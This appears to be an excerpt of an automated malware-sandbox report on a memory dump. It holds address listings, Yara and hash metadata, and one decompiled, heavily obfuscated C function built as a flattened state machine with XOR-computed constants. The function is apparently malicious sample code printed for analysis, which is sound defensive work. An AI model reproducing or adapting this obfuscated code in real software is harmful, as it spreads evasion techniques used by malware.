                                          0x006cafa3
                                          0x006cafa8
                                          0x006cafa9
                                          0x006cafac
                                          0x006cafaf
                                          0x006cafaf
                                          0x006cafaf
                                          0x006cafb2
                                          0x006cafbb
                                          0x006cafbe
                                          0x006cafc7
                                          0x00000000
                                          0x006cae5a
                                          0x006cae5a
                                          0x006cae60
                                          0x006caf41
                                          0x006caf48
                                          0x00000000
                                          0x006cae66
                                          0x006cae66
                                          0x006cae6c
                                          0x006caf1a
                                          0x006caf21
                                          0x00000000
                                          0x006cae72
                                          0x006cae72
                                          0x006cae78
                                          0x006caef6
                                          0x006caefd
                                          0x00000000
                                          0x006cae7a
                                          0x006cae7a
                                          0x006cae80
                                          0x006cb02b
                                          0x006cb02c
                                          0x006cb033
                                          0x006cb03a
                                          0x00000000
                                          0x006cae86
                                          0x006cae86
                                          0x006cae8c
                                          0x00000000
                                          0x006cae92
                                          0x006caeb5
                                          0x006caebd
                                          0x006caec2
                                          0x006caec7
                                          0x006caecf
                                          0x00000000
                                          0x006caecf
                                          0x006cae8c
                                          0x006cae80
                                          0x006cae78
                                          0x006cae6c
                                          0x006cae60
                                          0x006cae54
                                          0x00000000
                                          0x006cae48
                                          0x006caaa4
                                          0x006caaa1

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
                                          • API String ID: 0-3061497230
                                          • Opcode ID: 616817d18bb11978b28ed6f3587a58edc1c0e74bb538bcf7a6769ee7c5303f1d
                                          • Instruction ID: 1398b3b8554bf87ac37234fd396396e4e8d92044715ac4fb606818e01fa71e33
                                          • Opcode Fuzzy Hash: 616817d18bb11978b28ed6f3587a58edc1c0e74bb538bcf7a6769ee7c5303f1d
                                          • Instruction Fuzzy Hash: CE82157150C3858BE378CF65C549BABBBE2FBC4318F10891DE19A86260DBB59949CF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 95%
                                          			E006CC769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
                                          				char _v4;
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				char _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				char _v28;
                                          				intOrPtr _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				signed int _v108;
                                          				signed int _v112;
                                          				signed int _v116;
                                          				signed int _v120;
                                          				signed int _v124;
                                          				signed int _v128;
                                          				signed int _v132;
                                          				signed int _v136;
                                          				signed int _v140;
                                          				signed int _v144;
                                          				signed int _v148;
                                          				signed int _v152;
                                          				signed int _v156;
                                          				signed int _v160;
                                          				signed int _v164;
                                          				signed int _v168;
                                          				signed int _v172;
                                          				signed int _v176;
                                          				signed int _v180;
                                          				signed int _v184;
                                          				signed int _v188;
                                          				signed int _v192;
                                          				signed int _v196;
                                          				signed int _v200;
                                          				signed int _v204;
                                          				signed int _v208;
                                          				signed int _v212;
                                          				signed int _v216;
                                          				signed int _v220;
                                          				signed int _v224;
                                          				signed int _v228;
                                          				signed int _v232;
                                          				signed int _v236;
                                          				signed int _v240;
                                          				signed int _v244;
                                          				signed int _v248;
                                          				signed int _v252;
                                          				signed int _v256;
                                          				signed int _v260;
                                          				signed int _v264;
                                          				signed int _v268;
                                          				signed int _v272;
                                          				signed int _v276;
                                          				signed int _v280;
                                          				signed int _v284;
                                          				signed int _v288;
                                          				unsigned int _v292;
                                          				signed int _v296;
                                          				signed int _v300;
                                          				signed int _v304;
                                          				signed int _v308;
                                          				signed int _v312;
                                          				intOrPtr _v316;
                                          				char _v320;
                                          				intOrPtr _t666;
                                          				intOrPtr _t667;
                                          				intOrPtr _t672;
                                          				void* _t679;
                                          				intOrPtr _t680;
                                          				intOrPtr _t687;
                                          				intOrPtr _t689;
                                          				intOrPtr _t693;
                                          				intOrPtr* _t694;
                                          				signed int _t706;
                                          				intOrPtr _t707;
                                          				void* _t712;
                                          				intOrPtr _t718;
                                          				void* _t758;
                                          				signed int _t773;
                                          				signed int _t774;
                                          				signed int _t775;
                                          				signed int _t776;
                                          				signed int _t777;
                                          				signed int _t778;
                                          				signed int _t779;
                                          				signed int _t780;
                                          				signed int _t781;
                                          				signed int _t782;
                                          				signed int _t783;
                                          				signed int _t784;
                                          				intOrPtr _t785;
                                          				signed int _t786;
                                          				intOrPtr _t788;
                                          				char _t793;
                                          				void* _t795;
                                          				void* _t797;
                                          
                                          				_t694 = __edx;
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_v20 = __ecx;
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20 & 0x0000ffff);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E006C602B(_a20 & 0x0000ffff);
                                          				_v12 = 0x78501c;
                                          				_v24 = 0;
                                          				_v8 = 0;
                                          				_t793 = 0;
                                          				_v4 = 0;
                                          				_t795 =  &_v320 + 0x30;
                                          				_v232 = 0x7906;
                                          				_t786 = 0xcd25e5e;
                                          				_v232 = _v232 << 6;
                                          				_v232 = _v232 >> 0xa;
                                          				_v232 = _v232 ^ 0x00000790;
                                          				_v156 = 0xf83b;
                                          				_v156 = _v156 >> 0xb;
                                          				_v156 = _v156 ^ 0x0000000c;
                                          				_v52 = 0x2ceb;
                                          				_v52 = _v52 | 0xa5610ac4;
                                          				_v52 = _v52 ^ 0xa5612e27;
                                          				_v208 = 0x96db;
                                          				_v208 = _v208 + 0xffffce2c;
                                          				_v208 = _v208 | 0x71346f29;
                                          				_v208 = _v208 ^ 0x7134ef2f;
                                          				_v116 = 0x28a4;
                                          				_v116 = _v116 + 0xffff342e;
                                          				_v116 = _v116 ^ 0xffff1cd2;
                                          				_v124 = 0xa3bc;
                                          				_v124 = _v124 + 0xffffb3e2;
                                          				_v124 = _v124 ^ 0x0040579e;
                                          				_v132 = 0x4a92;
                                          				_v132 = _v132 << 0xb;
                                          				_v132 = _v132 ^ 0x02509000;
                                          				_v140 = 0xcc93;
                                          				_v140 = _v140 >> 0xd;
                                          				_v140 = _v140 ^ 0x04000006;
                                          				_v148 = 0xadf6;
                                          				_v148 = _v148 >> 5;
                                          				_v148 = _v148 ^ 0x0008056f;
                                          				_v216 = 0xcf16;
                                          				_v216 = _v216 ^ 0x2caffd24;
                                          				_v216 = _v216 >> 8;
                                          				_v216 = _v216 ^ 0x002cad32;
                                          				_v296 = 0xe55e;
                                          				_v296 = _v296 << 0x10;
                                          				_v296 = _v296 + 0xffff79ea;
                                          				_v296 = _v296 << 5;
                                          				_v296 = _v296 ^ 0xabaf3c40;
                                          				_v152 = 0xf9a;
                                          				_v16 = 0;
                                          				_v320 = 0;
                                          				_v152 = _v152 * 0x3f;
                                          				_v152 = _v152 ^ 0x8003d6e6;
                                          				_v120 = 0x15;
                                          				_v120 = _v120 << 2;
                                          				_v120 = _v120 ^ 0x00000054;
                                          				_v144 = 0x2eae;
                                          				_v144 = _v144 + 0x3c19;
                                          				_v144 = _v144 ^ 0x00006ac4;
                                          				_v56 = 0xab01;
                                          				_t773 = 0x5e;
                                          				_v56 = _v56 / _t773;
                                          				_v56 = _v56 ^ 0x00004cb8;
                                          				_v104 = 0x2a8e;
                                          				_t774 = 0x2c;
                                          				_v104 = _v104 / _t774;
                                          				_v104 = _v104 ^ 0x000033ed;
                                          				_v292 = 0xd22b;
                                          				_v292 = _v292 | 0xd3babaa8;
                                          				_t775 = 0x50;
                                          				_v292 = _v292 * 0x6c;
                                          				_v292 = _v292 >> 7;
                                          				_v292 = _v292 ^ 0x00a58d92;
                                          				_v96 = 0x39fa;
                                          				_v96 = _v96 / _t775;
                                          				_v96 = _v96 ^ 0x00002d01;
                                          				_v240 = 0xf5d4;
                                          				_v240 = _v240 ^ 0x5b9fa071;
                                          				_v240 = _v240 >> 3;
                                          				_v240 = _v240 ^ 0x0b73efef;
                                          				_v248 = 0x1311;
                                          				_t776 = 0x42;
                                          				_v248 = _v248 / _t776;
                                          				_v248 = _v248 + 0x5e6d;
                                          				_v248 = _v248 ^ 0x00004acc;
                                          				_v88 = 0x907;
                                          				_t777 = 0x6e;
                                          				_v88 = _v88 * 0x48;
                                          				_v88 = _v88 ^ 0x0002ff0c;
                                          				_v36 = 0x8ec2;
                                          				_v36 = _v36 / _t777;
                                          				_v36 = _v36 ^ 0x00005772;
                                          				_v260 = 0x4792;
                                          				_v260 = _v260 << 0xd;
                                          				_v260 = _v260 >> 0xb;
                                          				_v260 = _v260 >> 4;
                                          				_v260 = _v260 ^ 0x00006a86;
                                          				_v224 = 0x4f89;
                                          				_v224 = _v224 + 0xffff3059;
                                          				_t778 = 0x21;
                                          				_v224 = _v224 * 0x6e;
                                          				_v224 = _v224 ^ 0xffc8e4d3;
                                          				_v48 = 0x8858;
                                          				_v48 = _v48 + 0x804a;
                                          				_v48 = _v48 ^ 0x00017e21;
                                          				_v312 = 0xd58c;
                                          				_v312 = _v312 | 0x45747a0f;
                                          				_v312 = _v312 >> 0xa;
                                          				_v312 = _v312 / _t778;
                                          				_v312 = _v312 ^ 0x00008646;
                                          				_v300 = 0xadcd;
                                          				_v300 = _v300 >> 8;
                                          				_v300 = _v300 << 9;
                                          				_v300 = _v300 >> 1;
                                          				_v300 = _v300 ^ 0x00008fc4;
                                          				_v268 = 0xd742;
                                          				_t779 = 0x30;
                                          				_v268 = _v268 / _t779;
                                          				_v268 = _v268 + 0x61d9;
                                          				_v268 = _v268 >> 4;
                                          				_v268 = _v268 ^ 0x00000191;
                                          				_v204 = 0x8d76;
                                          				_v204 = _v204 | 0x1111a955;
                                          				_v204 = _v204 << 5;
                                          				_v204 = _v204 ^ 0x2235a282;
                                          				_v64 = 0x8939;
                                          				_v64 = _v64 + 0xffff3fc4;
                                          				_v64 = _v64 ^ 0xffff80c7;
                                          				_v276 = 0x72;
                                          				_v276 = _v276 * 0x7d;
                                          				_v276 = _v276 + 0xffff8366;
                                          				_v276 = _v276 >> 9;
                                          				_v276 = _v276 ^ 0x007facee;
                                          				_v44 = 0xf34a;
                                          				_v44 = _v44 + 0xffffbf38;
                                          				_v44 = _v44 ^ 0x00008263;
                                          				_v112 = 0x1dc0;
                                          				_v112 = _v112 ^ 0x2c6551d7;
                                          				_v112 = _v112 ^ 0x2c653ad3;
                                          				_v228 = 0xc596;
                                          				_v228 = _v228 ^ 0x9ca21630;
                                          				_v228 = _v228 ^ 0x8f0fd5bf;
                                          				_v228 = _v228 ^ 0x13ad7fff;
                                          				_v196 = 0x8cfa;
                                          				_v196 = _v196 >> 1;
                                          				_v196 = _v196 ^ 0xfb4b109c;
                                          				_v196 = _v196 ^ 0xfb4b1bca;
                                          				_v236 = 0x2fd6;
                                          				_v236 = _v236 << 7;
                                          				_v236 = _v236 << 2;
                                          				_v236 = _v236 ^ 0x005fedce;
                                          				_v180 = 0x51a5;
                                          				_v180 = _v180 ^ 0x4af0041f;
                                          				_v180 = _v180 + 0xfffff3cf;
                                          				_v180 = _v180 ^ 0x4af05e30;
                                          				_v244 = 0x8950;
                                          				_v244 = _v244 << 0xc;
                                          				_v244 = _v244 | 0xbaabdb8a;
                                          				_v244 = _v244 ^ 0xbabf869d;
                                          				_v40 = 0xc836;
                                          				_v40 = _v40 + 0xffff3474;
                                          				_v40 = _v40 ^ 0xffff8af1;
                                          				_v176 = 0x9727;
                                          				_v176 = _v176 + 0xffffb8fc;
                                          				_v176 = _v176 >> 3;
                                          				_v176 = _v176 ^ 0x00001e80;
                                          				_v304 = 0x64c7;
                                          				_v304 = _v304 + 0x56f7;
                                          				_v304 = _v304 ^ 0x2de137fe;
                                          				_v304 = _v304 + 0xaf99;
                                          				_v304 = _v304 ^ 0x2de22ef8;
                                          				_v308 = 0x2e06;
                                          				_v308 = _v308 | 0x78777a1f;
                                          				_v308 = _v308 * 0x79;
                                          				_v308 = _v308 >> 3;
                                          				_v308 = _v308 ^ 0x1e0f1828;
                                          				_v92 = 0xc9a2;
                                          				_v92 = _v92 | 0xf3c29ea2;
                                          				_v92 = _v92 ^ 0xf3c28d84;
                                          				_v100 = 0xecbf;
                                          				_v100 = _v100 + 0xffff0faf;
                                          				_v100 = _v100 ^ 0xffffc0a5;
                                          				_v192 = 0x95e0;
                                          				_v192 = _v192 << 8;
                                          				_v192 = _v192 << 9;
                                          				_v192 = _v192 ^ 0x2bc00f3b;
                                          				_v200 = 0x7c40;
                                          				_t780 = 0x3a;
                                          				_v200 = _v200 / _t780;
                                          				_v200 = _v200 << 8;
                                          				_v200 = _v200 ^ 0x000244df;
                                          				_v272 = 0x7605;
                                          				_v272 = _v272 << 5;
                                          				_v272 = _v272 + 0xffffdeaf;
                                          				_v272 = _v272 >> 0xb;
                                          				_v272 = _v272 ^ 0x00001482;
                                          				_v108 = 0x1c78;
                                          				_v108 = _v108 + 0x3c33;
                                          				_v108 = _v108 ^ 0x00006c40;
                                          				_v280 = 0xd61a;
                                          				_v280 = _v280 ^ 0xfb8fe6a7;
                                          				_v280 = _v280 + 0x5fc;
                                          				_v280 = _v280 | 0xbad3e440;
                                          				_v280 = _v280 ^ 0xfbdf8156;
                                          				_v288 = 0x89a2;
                                          				_v288 = _v288 + 0xffff4641;
                                          				_v288 = _v288 >> 0xc;
                                          				_v288 = _v288 >> 0xd;
                                          				_v288 = _v288 ^ 0x000071e8;
                                          				_v252 = 0xe21c;
                                          				_v252 = _v252 ^ 0x457ecc8f;
                                          				_t781 = 0x67;
                                          				_v252 = _v252 * 0x59;
                                          				_v252 = _v252 ^ 0x28de7ded;
                                          				_v84 = 0xe1;
                                          				_v84 = _v84 >> 3;
                                          				_v84 = _v84 ^ 0x00001e3a;
                                          				_v184 = 0xbeeb;
                                          				_v184 = _v184 * 0x12;
                                          				_v184 = _v184 + 0x8ae1;
                                          				_v184 = _v184 ^ 0x000de1ad;
                                          				_v68 = 0xfd10;
                                          				_v68 = _v68 >> 0xf;
                                          				_v68 = _v68 ^ 0x000036f7;
                                          				_v76 = 0x1f03;
                                          				_v76 = _v76 * 0x49;
                                          				_v76 = _v76 ^ 0x000897f9;
                                          				_v264 = 0xf0d9;
                                          				_v264 = _v264 * 0x66;
                                          				_v264 = _v264 + 0xffffb5cf;
                                          				_v264 = _v264 + 0xea22;
                                          				_v264 = _v264 ^ 0x0060dcb6;
                                          				_v168 = 0xdfa9;
                                          				_v168 = _v168 ^ 0x7c3d7298;
                                          				_v168 = _v168 ^ 0xd2777362;
                                          				_v168 = _v168 ^ 0xae4ad343;
                                          				_v72 = 0x8534;
                                          				_v72 = _v72 ^ 0x085524ca;
                                          				_v72 = _v72 ^ 0x085595c2;
                                          				_v136 = 0x90f3;
                                          				_v136 = _v136 + 0xcfad;
                                          				_v136 = _v136 ^ 0x00017ab2;
                                          				_v220 = 0x7eee;
                                          				_v220 = _v220 >> 3;
                                          				_v220 = _v220 + 0xffffea23;
                                          				_v220 = _v220 ^ 0xffffcf89;
                                          				_v164 = 0x31cc;
                                          				_v164 = _v164 | 0x82d13576;
                                          				_v164 = _v164 >> 3;
                                          				_v164 = _v164 ^ 0x105a14dc;
                                          				_v284 = 0xab9f;
                                          				_v284 = _v284 / _t781;
                                          				_v284 = _v284 + 0xffff982b;
                                          				_v284 = _v284 + 0xcf45;
                                          				_v284 = _v284 ^ 0x000072b9;
                                          				_v80 = 0x4458;
                                          				_v80 = _v80 + 0xfa7e;
                                          				_v80 = _v80 ^ 0x000168e1;
                                          				_v128 = 0x89b9;
                                          				_v128 = _v128 + 0xe32e;
                                          				_v128 = _v128 ^ 0x00010bac;
                                          				_v172 = 0xe617;
                                          				_v172 = _v172 << 4;
                                          				_v172 = _v172 + 0xb499;
                                          				_v172 = _v172 ^ 0x000f5cd6;
                                          				_v212 = 0x2b1d;
                                          				_v212 = _v212 << 0x10;
                                          				_t782 = 0x21;
                                          				_v212 = _v212 * 0x7f;
                                          				_v212 = _v212 ^ 0x63636a51;
                                          				_v188 = 0x87b6;
                                          				_v188 = _v188 | 0xa87ad713;
                                          				_v188 = _v188 << 3;
                                          				_v188 = _v188 ^ 0x43d6c05c;
                                          				_v60 = 0x1ec0;
                                          				_v60 = _v60 / _t782;
                                          				_v60 = _v60 ^ 0x000042c8;
                                          				_v256 = 0x1798;
                                          				_v256 = _v256 ^ 0x8091dd24;
                                          				_v256 = _v256 | 0xdc47dedf;
                                          				_t783 = 0x19;
                                          				_v256 = _v256 * 0x5d;
                                          				_v256 = _v256 ^ 0x3a6c6c2e;
                                          				_v160 = 0x6f3f;
                                          				_v160 = _v160 / _t783;
                                          				_t784 = 0x73;
                                          				_t785 = _v20;
                                          				_v160 = _v160 / _t784;
                                          				_v160 = _v160 ^ 0x00005ad1;
                                          				while(1) {
                                          					L1:
                                          					_t758 = 0x1fbed331;
                                          					while(1) {
                                          						_t797 = _t786 - _t758;
                                          						if(_t797 <= 0) {
                                          						}
                                          						L3:
                                          						if(_t797 == 0) {
                                          							__eflags = E006C5B79(_t785, _v20);
                                          							_t786 = 0x1b724d6a;
                                          							_t679 = 1;
                                          							_t793 =  !=  ? _t679 : _t793;
                                          							L13:
                                          							_t666 = _v316;
                                          							L14:
                                          							_t707 = _v320;
                                          							goto L1;
                                          						}
                                          						if(_t786 == 0xa0d70be) {
                                          							__eflags = _t694;
                                          							if(_t694 == 0) {
                                          								_t718 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t718 =  *_t694;
                                          							}
                                          							__eflags = _t694;
                                          							if(_t694 == 0) {
                                          								_t680 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t680 =  *((intOrPtr*)(_t694 + 4));
                                          							}
                                          							E006D8422(_v72, _v136, _v220, _a28, _t785, _t680, _t718, _v164, _t718);
                                          							_t795 = _t795 + 0x1c;
                                          							asm("sbb esi, esi");
                                          							_t786 = (_t786 & 0x1873afa8) + 0x1b724d6a;
                                          							goto L13;
                                          						}
                                          						if(_t786 == 0xcd25e5e) {
                                          							_t786 = 0x25fbc0d1;
                                          							while(1) {
                                          								_t797 = _t786 - _t758;
                                          								if(_t797 <= 0) {
                                          								}
                                          								goto L25;
                                          							}
                                          							goto L3;
                                          						}
                                          						if(_t786 == 0xdfc12f5) {
                                          							_t666 = E006D7955(_a20, _v228, _v196, _t707, _v236, _v180, _t707, _v244, _v40, _v144, _a12, _t707, _v32, _t707, _v176);
                                          							_t795 = _t795 + 0x34;
                                          							_v316 = _t666;
                                          							__eflags = _t666;
                                          							_t786 =  !=  ? 0x20246154 : 0x1e7ff602;
                                          							goto L14;
                                          						}
                                          						if(_t786 == 0x1b724d6a) {
                                          							E006C7925(_v284, _t785, _v80, _v128);
                                          							_t786 = 0x2cd2473d;
                                          							L12:
                                          							goto L13;
                                          						}
                                          						if(_t786 != 0x1e7ff602) {
                                          							L45:
                                          							__eflags = _t786 - 0x258a7eda;
                                          							if(_t786 == 0x258a7eda) {
                                          								L10:
                                          								return _t793;
                                          							}
                                          							_t666 = _v316;
                                          							continue;
                                          						}
                                          						E006C7925(_v60, _v32, _v256, _v160);
                                          						goto L10;
                                          						L25:
                                          						__eflags = _t786 - 0x20246154;
                                          						if(_t786 == 0x20246154) {
                                          							__eflags = _t694;
                                          							if(__eflags == 0) {
                                          								_t787 = _v16;
                                          							} else {
                                          								_push(_v308);
                                          								_t667 = E006D889D(0x6dc850, _v304, __eflags);
                                          								_t787 = _t667;
                                          								_v16 = _t667;
                                          							}
                                          							_t785 = E006C1BD7(_v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v92, _v100, _v192, _v200, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _v316, _v152 | _v296 | _v216 | _v148 | _v140 | _v132 | _v124 | _v116 | _v208, _t705, _v272, _t787, _v108, _a24, _t705, _v280, _v288);
                                          							_t706 = _v252;
                                          							E006D2025(_t706, _t787, _v84, _v184);
                                          							_t795 = _t795 + 0x40;
                                          							__eflags = _t785;
                                          							if(_t785 == 0) {
                                          								_t786 = 0x2cd2473d;
                                          								L44:
                                          								_t707 = _v320;
                                          								_t758 = 0x1fbed331;
                                          								goto L45;
                                          							}
                                          							_push(_t706);
                                          							_v28 = 1;
                                          							_t693 = E006D6AFF(_v68, _v76, _v264,  &_v28, _v168, _t785);
                                          							_t795 = _t795 + 0x18;
                                          							_v28 = _t693;
                                          							_t786 = 0xa0d70be;
                                          							goto L13;
                                          						}
                                          						__eflags = _t786 - 0x25fbc0d1;
                                          						if(_t786 == 0x25fbc0d1) {
                                          							_push(0x200);
                                          							_v24 = 0x200;
                                          							_t788 = E006C8736(0x200);
                                          							_t712 = 0x200;
                                          							__eflags = _t788;
                                          							if(_t788 != 0) {
                                          								_t687 = E006CF74E(_t712, _t788,  &_v24, _v96, _v240, _v248);
                                          								_t795 = _t795 + 0x10;
                                          								__eflags = _t687;
                                          								if(_t687 == 0) {
                                          									_t689 = E006D0F0C(_v88, _t788, _t712, _v36, _v232, _t712, _v260);
                                          									_t795 = _t795 + 0x14;
                                          									_v320 = _t689;
                                          								}
                                          								E006CF536(_v224, _v48, _v312, _t788);
                                          							}
                                          							_t786 = 0x276816a4;
                                          							goto L13;
                                          						}
                                          						__eflags = _t786 - 0x276816a4;
                                          						if(_t786 == 0x276816a4) {
                                          							_push(_t707);
                                          							_t672 = E006C5A52(_t707, _t707, _v300, _v268, _v204, _v64, _v120);
                                          							__eflags = _t672;
                                          							_v32 = _t672;
                                          							_t786 =  !=  ? 0xdfc12f5 : 0x258a7eda;
                                          							E006CF536(_v276, _v44, _v112, _v320);
                                          							_t795 = _t795 + 0x24;
                                          							goto L44;
                                          						}
                                          						__eflags = _t786 - 0x2cd2473d;
                                          						if(_t786 == 0x2cd2473d) {
                                          							E006C7925(_v172, _t666, _v212, _v188);
                                          							_t786 = 0x1e7ff602;
                                          							goto L12;
                                          						}
                                          						__eflags = _t786 - 0x33e5fd12;
                                          						if(__eflags != 0) {
                                          							goto L45;
                                          						}
                                          						__eflags = E006D687F(_t785, _v156, __eflags) - _v52;
                                          						_t758 = 0x1fbed331;
                                          						_t666 = _v316;
                                          						_t707 = _v320;
                                          						_t786 =  ==  ? 0x1fbed331 : 0x1b724d6a;
                                          					}
                                          				}
                                          			}



















































































































                                          0x006ccd3e
                                          0x006ccd49
                                          0x006ccd54
                                          0x006ccd5f
                                          0x006ccd6a
                                          0x006ccd72
                                          0x006ccd7d
                                          0x006ccd85
                                          0x006ccd8d
                                          0x006ccd95
                                          0x006ccd9d
                                          0x006ccda5
                                          0x006ccdad
                                          0x006ccdba
                                          0x006ccdbe
                                          0x006ccdc3
                                          0x006ccdcb
                                          0x006ccdd6
                                          0x006ccde1
                                          0x006ccdec
                                          0x006ccdf7
                                          0x006cce02
                                          0x006cce0d
                                          0x006cce18
                                          0x006cce20
                                          0x006cce28
                                          0x006cce35
                                          0x006cce49
                                          0x006cce4e
                                          0x006cce57
                                          0x006cce5f
                                          0x006cce6a
                                          0x006cce72
                                          0x006cce77
                                          0x006cce7f
                                          0x006cce84
                                          0x006cce8c
                                          0x006cce97
                                          0x006ccea2
                                          0x006ccead
                                          0x006cceb5
                                          0x006ccebd
                                          0x006ccec5
                                          0x006ccecd
                                          0x006cced5
                                          0x006ccedd
                                          0x006ccee5
                                          0x006cceea
                                          0x006cceef
                                          0x006ccef7
                                          0x006cceff
                                          0x006ccf0c
                                          0x006ccf0d
                                          0x006ccf11
                                          0x006ccf19
                                          0x006ccf24
                                          0x006ccf2c
                                          0x006ccf37
                                          0x006ccf4a
                                          0x006ccf51
                                          0x006ccf5c
                                          0x006ccf67
                                          0x006ccf72
                                          0x006ccf7a
                                          0x006ccf85
                                          0x006ccf98
                                          0x006ccf9f
                                          0x006ccfaa
                                          0x006ccfb7
                                          0x006ccfbb
                                          0x006ccfc3
                                          0x006ccfcb
                                          0x006ccfd3
                                          0x006ccfde
                                          0x006ccfe9
                                          0x006ccff4
                                          0x006ccfff
                                          0x006cd00a
                                          0x006cd015
                                          0x006cd020
                                          0x006cd02b
                                          0x006cd036
                                          0x006cd041
                                          0x006cd049
                                          0x006cd04e
                                          0x006cd056
                                          0x006cd05e
                                          0x006cd069
                                          0x006cd074
                                          0x006cd07c
                                          0x006cd087
                                          0x006cd095
                                          0x006cd099
                                          0x006cd0a1
                                          0x006cd0a9
                                          0x006cd0b1
                                          0x006cd0bc
                                          0x006cd0c7
                                          0x006cd0d2
                                          0x006cd0df
                                          0x006cd0ea
                                          0x006cd0f5
                                          0x006cd100
                                          0x006cd108
                                          0x006cd113
                                          0x006cd11e
                                          0x006cd126
                                          0x006cd132
                                          0x006cd135
                                          0x006cd13c
                                          0x006cd147
                                          0x006cd152
                                          0x006cd15d
                                          0x006cd165
                                          0x006cd170
                                          0x006cd186
                                          0x006cd18d
                                          0x006cd198
                                          0x006cd1a0
                                          0x006cd1a8
                                          0x006cd1b5
                                          0x006cd1b8
                                          0x006cd1bc
                                          0x006cd1c4
                                          0x006cd1da
                                          0x006cd1e8
                                          0x006cd1eb
                                          0x006cd1f2
                                          0x006cd1f9
                                          0x006cd208
                                          0x006cd208
                                          0x006cd208
                                          0x006cd20d
                                          0x006cd20d
                                          0x006cd20f
                                          0x006cd20f
                                          0x006cd215
                                          0x006cd215
                                          0x006cd386
                                          0x006cd388
                                          0x006cd38f
                                          0x006cd390
                                          0x006cd29d
                                          0x006cd29d
                                          0x006cd2a1
                                          0x006cd2a1
                                          0x00000000
                                          0x006cd2a1
                                          0x006cd221
                                          0x006cd31f
                                          0x006cd321
                                          0x006cd327
                                          0x006cd327
                                          0x006cd323
                                          0x006cd323
                                          0x006cd323
                                          0x006cd329
                                          0x006cd32b
                                          0x006cd332
                                          0x006cd332
                                          0x006cd32d
                                          0x006cd32d
                                          0x006cd32d
                                          0x006cd35b
                                          0x006cd360
                                          0x006cd365
                                          0x006cd36d
                                          0x00000000
                                          0x006cd36d
                                          0x006cd22d
                                          0x006cd315
                                          0x006cd20d
                                          0x006cd20d
                                          0x006cd20f
                                          0x006cd20f
                                          0x00000000
                                          0x006cd20f
                                          0x00000000
                                          0x006cd20d
                                          0x006cd23a
                                          0x006cd2f8
                                          0x006cd2fd
                                          0x006cd300
                                          0x006cd304
                                          0x006cd310
                                          0x00000000
                                          0x006cd310
                                          0x006cd242
                                          0x006cd291
                                          0x006cd296
                                          0x006cd29b
                                          0x00000000
                                          0x006cd29c
                                          0x006cd24a
                                          0x006cd639
                                          0x006cd639
                                          0x006cd63f
                                          0x006cd272
                                          0x006cd27c
                                          0x006cd27c
                                          0x006cd645
                                          0x00000000
                                          0x006cd645
                                          0x006cd269
                                          0x00000000
                                          0x006cd398
                                          0x006cd398
                                          0x006cd39e
                                          0x006cd51a
                                          0x006cd51c
                                          0x006cd53c
                                          0x006cd51e
                                          0x006cd51e
                                          0x006cd52b
                                          0x006cd530
                                          0x006cd533
                                          0x006cd533
                                          0x006cd5c9
                                          0x006cd5d2
                                          0x006cd5d9
                                          0x006cd5de
                                          0x006cd5e1
                                          0x006cd5e3
                                          0x006cd62b
                                          0x006cd630
                                          0x006cd630
                                          0x006cd634
                                          0x00000000
                                          0x006cd634
                                          0x006cd5e5
                                          0x006cd5f1
                                          0x006cd612
                                          0x006cd617
                                          0x006cd61a
                                          0x006cd621
                                          0x00000000
                                          0x006cd621
                                          0x006cd3a4
                                          0x006cd3aa
                                          0x006cd498
                                          0x006cd49a
                                          0x006cd4a6
                                          0x006cd4a9
                                          0x006cd4aa
                                          0x006cd4ac
                                          0x006cd4c7
                                          0x006cd4cc
                                          0x006cd4cf
                                          0x006cd4d1
                                          0x006cd4ed
                                          0x006cd4f2
                                          0x006cd4f5
                                          0x006cd4f5
                                          0x006cd509
                                          0x006cd50f
                                          0x006cd510
                                          0x00000000
                                          0x006cd510
                                          0x006cd3b0
                                          0x006cd3b6
                                          0x006cd423
                                          0x006cd442
                                          0x006cd447
                                          0x006cd449
                                          0x006cd45a
                                          0x006cd474
                                          0x006cd479
                                          0x00000000
                                          0x006cd479
                                          0x006cd3b8
                                          0x006cd3be
                                          0x006cd414
                                          0x006cd419
                                          0x00000000
                                          0x006cd419
                                          0x006cd3c0
                                          0x006cd3c6
                                          0x00000000
                                          0x00000000
                                          0x006cd3e6
                                          0x006cd3e8
                                          0x006cd3ed
                                          0x006cd3f1
                                          0x006cd3f5
                                          0x006cd3f5
                                          0x006cd20d

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
